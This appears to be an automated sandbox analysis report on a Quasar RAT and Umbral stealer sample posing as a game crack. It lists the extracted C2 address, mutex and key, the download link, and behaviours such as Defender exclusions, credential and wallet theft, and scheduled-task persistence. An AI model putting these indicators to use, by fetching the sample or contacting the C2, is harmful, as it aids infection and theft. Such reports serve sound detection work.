quasar | hxxps://mega[.]nz/file/Z09FHCqQ#oKEk_Od_s85u61Db6ftPGH22-pL6t1UTyAUk3Tk6AAs

Analysis

max time kernel
240s
max time network
244s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
17-07-2024 03:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/Z09FHCqQ#oKEk_Od_s85u61Db6ftPGH22-pL6t1UTyAUk3Tk6AAs

Score

10^/10

quasar umbral steam defense_evasion execution pyinstaller spyware stealer trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Steam

20.ip.gl.ply.gg:55257

Mutex

15d4edb7-40c0-4a95-9dc8-8fe93071bce0

Attributes

encryption_key
F1B995FFCFBEAA3218870A13F82413DC65D82218
install_name
Steam.exe
log_directory
Logs
reconnect_delay
3000
startup_key
SteamClient
subdirectory
%appdata%

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023625-853.dat	family_umbral
behavioral1/memory/1660-859-0x0000015AF2990000-0x0000015AF29E8000-memory.dmp	family_umbral

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023623-835.dat	family_quasar
behavioral1/memory/2724-841-0x0000000000080000-0x00000000003E6000-memory.dmp	family_quasar

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1740	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WaveCrack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WaveCrack.sfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WaveCrack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	Cracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	WaveWindows.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Skype.exe	Skype.exe

Executes dropped EXE 14 IoCs

pid	Process
5392	winrar-x64-701.exe
748	winrar-x64-701.exe
4028	WaveCrack.exe
4500	WaveCrack.sfx.exe
3472	WaveWindows.exe
5724	WaveCrack.exe
5036	WaveCrack.exe
2224	Cracked.exe
2724	Steam.exe
1660	OneDrive.exe
212	Skype.exe
5132	Skype.exe
4052	Steam.exe
4708	node.exe

Loads dropped DLL 60 IoCs

pid	Process
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5036	WaveCrack.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe
5132	Skype.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 29 IoCs

Web Service

T1102

flow	ioc
150	raw.githubusercontent.com
152	raw.githubusercontent.com
154	raw.githubusercontent.com
156	raw.githubusercontent.com
224	discord.com
151	raw.githubusercontent.com
222	discord.com
229	discord.com
158	raw.githubusercontent.com
201	discord.com
212	discord.com
208	discord.com
223	discord.com
225	discord.com
203	discord.com
209	discord.com
210	discord.com
215	discord.com
220	discord.com
226	discord.com
153	raw.githubusercontent.com
214	discord.com
149	raw.githubusercontent.com
157	raw.githubusercontent.com
155	raw.githubusercontent.com
211	discord.com
221	discord.com
227	discord.com
228	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
173	ip-api.com
178	api.ipify.org
179	api.ipify.org

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5928	cmd.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\%appdata%\Steam.exe	Steam.exe
File opened for modification	C:\Program Files\%appdata%\Steam.exe	Steam.exe
File opened for modification	C:\Program Files\%appdata%	Steam.exe
File opened for modification	C:\Program Files\%appdata%\Steam.exe	Steam.exe
File opened for modification	C:\Program Files\%appdata%	Steam.exe

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0008000000023622-700.dat	pyinstaller
behavioral1/files/0x0008000000023624-846.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5672	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1176886754-713327781-2233697964-1000\{A5A29D93-92A0-40EA-80B1-6295F7E1E2E1}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 82625.crdownload:SmartScreen	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5552	schtasks.exe
4752	schtasks.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
4020	msedge.exe
4020	msedge.exe
2364	msedge.exe
2364	msedge.exe
3220	identity_helper.exe
3220	identity_helper.exe
5804	msedge.exe
5804	msedge.exe
5704	msedge.exe
5704	msedge.exe
2388	msedge.exe
2388	msedge.exe
3308	msedge.exe
3308	msedge.exe
3308	msedge.exe
3308	msedge.exe
3472	WaveWindows.exe
3472	WaveWindows.exe
1660	OneDrive.exe
1660	OneDrive.exe
1740	powershell.exe
1740	powershell.exe
1740	powershell.exe
2624	powershell.exe
2624	powershell.exe
2624	powershell.exe
5836	powershell.exe
5836	powershell.exe
5836	powershell.exe
1920	powershell.exe
1920	powershell.exe
1920	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	1664	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1664	AUDIODG.EXE
Token: SeRestorePrivilege	1872	7zG.exe
Token: 35	1872	7zG.exe
Token: SeSecurityPrivilege	1872	7zG.exe
Token: SeSecurityPrivilege	1872	7zG.exe
Token: SeDebugPrivilege	3472	WaveWindows.exe
Token: SeDebugPrivilege	2724	Steam.exe
Token: SeDebugPrivilege	1660	OneDrive.exe
Token: SeIncreaseQuotaPrivilege	6044	wmic.exe
Token: SeSecurityPrivilege	6044	wmic.exe
Token: SeTakeOwnershipPrivilege	6044	wmic.exe
Token: SeLoadDriverPrivilege	6044	wmic.exe
Token: SeSystemProfilePrivilege	6044	wmic.exe
Token: SeSystemtimePrivilege	6044	wmic.exe
Token: SeProfSingleProcessPrivilege	6044	wmic.exe
Token: SeIncBasePriorityPrivilege	6044	wmic.exe
Token: SeCreatePagefilePrivilege	6044	wmic.exe
Token: SeBackupPrivilege	6044	wmic.exe
Token: SeRestorePrivilege	6044	wmic.exe
Token: SeShutdownPrivilege	6044	wmic.exe
Token: SeDebugPrivilege	6044	wmic.exe
Token: SeSystemEnvironmentPrivilege	6044	wmic.exe
Token: SeRemoteShutdownPrivilege	6044	wmic.exe
Token: SeUndockPrivilege	6044	wmic.exe
Token: SeManageVolumePrivilege	6044	wmic.exe
Token: 33	6044	wmic.exe
Token: 34	6044	wmic.exe
Token: 35	6044	wmic.exe
Token: 36	6044	wmic.exe
Token: SeDebugPrivilege	4052	Steam.exe
Token: SeIncreaseQuotaPrivilege	6044	wmic.exe
Token: SeSecurityPrivilege	6044	wmic.exe
Token: SeTakeOwnershipPrivilege	6044	wmic.exe
Token: SeLoadDriverPrivilege	6044	wmic.exe
Token: SeSystemProfilePrivilege	6044	wmic.exe
Token: SeSystemtimePrivilege	6044	wmic.exe
Token: SeProfSingleProcessPrivilege	6044	wmic.exe
Token: SeIncBasePriorityPrivilege	6044	wmic.exe
Token: SeCreatePagefilePrivilege	6044	wmic.exe
Token: SeBackupPrivilege	6044	wmic.exe
Token: SeRestorePrivilege	6044	wmic.exe
Token: SeShutdownPrivilege	6044	wmic.exe
Token: SeDebugPrivilege	6044	wmic.exe
Token: SeSystemEnvironmentPrivilege	6044	wmic.exe
Token: SeRemoteShutdownPrivilege	6044	wmic.exe
Token: SeUndockPrivilege	6044	wmic.exe
Token: SeManageVolumePrivilege	6044	wmic.exe
Token: 33	6044	wmic.exe
Token: 34	6044	wmic.exe
Token: 35	6044	wmic.exe
Token: 36	6044	wmic.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	5836	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeIncreaseQuotaPrivilege	2292	wmic.exe
Token: SeSecurityPrivilege	2292	wmic.exe
Token: SeTakeOwnershipPrivilege	2292	wmic.exe
Token: SeLoadDriverPrivilege	2292	wmic.exe
Token: SeSystemProfilePrivilege	2292	wmic.exe
Token: SeSystemtimePrivilege	2292	wmic.exe
Token: SeProfSingleProcessPrivilege	2292	wmic.exe
Token: SeIncBasePriorityPrivilege	2292	wmic.exe

Suspicious use of FindShellTrayWindow 55 IoCs

pid	Process
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
1872	7zG.exe
4052	Steam.exe
4052	Steam.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
2364	msedge.exe
4052	Steam.exe
4052	Steam.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5392	winrar-x64-701.exe
5392	winrar-x64-701.exe
5392	winrar-x64-701.exe
748	winrar-x64-701.exe
748	winrar-x64-701.exe
748	winrar-x64-701.exe
4052	Steam.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 4844	2364	msedge.exe	84
PID 2364 wrote to memory of 4844	2364	msedge.exe	84
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 1224	2364	msedge.exe	85
PID 2364 wrote to memory of 4020	2364	msedge.exe	86
PID 2364 wrote to memory of 4020	2364	msedge.exe	86
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87
PID 2364 wrote to memory of 5060	2364	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4324	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/Z09FHCqQ#oKEk_Od_s85u61Db6ftPGH22-pL6t1UTyAUk3Tk6AAs
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffac95846f8,0x7ffac9584708,0x7ffac9584718
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
  2⤵
  PID:1224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:3912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4128 /prefetch:8
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
  2⤵
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
  2⤵
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
  2⤵
  PID:5336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3404 /prefetch:8
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5212 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
  2⤵
  PID:1872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
  2⤵
  PID:2204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1812 /prefetch:1
  2⤵
  PID:2616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:5144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,7870688119128601815,15531556948870939413,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6464 /prefetch:8
  2⤵
  PID:5720
